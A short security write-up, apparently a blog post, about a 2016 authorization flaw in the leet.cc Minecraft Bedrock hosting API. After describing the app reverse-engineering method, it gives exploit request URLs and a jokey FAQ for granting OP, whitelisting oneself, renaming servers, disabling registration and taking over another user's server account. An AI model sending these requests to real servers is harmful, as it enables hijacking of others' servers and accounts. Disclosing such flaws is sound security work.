Writeups

https://leet.cc is an Minecraft bedrock server hosting provider.
The following bug allowed getting OP just by knowing someone’s server domain.

This bug is from 2016 the same time they had their database breached https://www.databreaches.net/leet-cc-data-hacked-in-february-publicly-dumped/ where someone uploaded a PHP shell to their website… This is from memory I may get stuff wrong.

I would hope it’s fixed now 🙂but then this is leet.cc

Methodology

Reverse engineer the Android app using online apk decompilers and look at the network traffic using https://www.telerik.com/fiddler to see if the API did authentication correctly.
Credit: https://www.youtube.com/watch?v=LbZqaLKS7V4

Server IDs (Incremental number) are used to identify what server to act on for the API.
This could be gotten easily by using https://leet.cc/verifyServerDomain.php?domain=<domain>
The user ID which used to be optional was the user’s email address or their device ID.

The exploit

In order to exploit this one would make a request to:

https://mainapi.leet.cc/actionNew.php?cmd=<command>&userID=<userID>&params[]=<serverID>&params[]=<commandParameter>&versionCode=176&password=something_secret&client=google-free&k=<Base 64 encoded MD5 Hash of part of the URL>&sys=<Base 64 encoded MD5 Hash of part of the URL> No one knows why k and sys were there.

And now the how to exploit FAQ 🙂

I want OP!

• <command> is changeOP
• <commandParameter> is your in-game name

I’m not whitelisted. What should I do?

• <command> is changeWhitelistPlayers
• <commandParameter> is your in-game name

The server name is missing a duck emoji, no problem!

• <command> is changeServerName
• <commandParameter> is 🦆

This old login using /login <password> is too annoying.

• Just set setUserRegistration to off!

I wanted an account takeover!

Okay send a request to https://mainapi.leet.cc/serverLogin.php?serverEmail=<attacker email>&serverPassword=<attacker password>&registerServerID=<serverId>&registerUserID=<userId>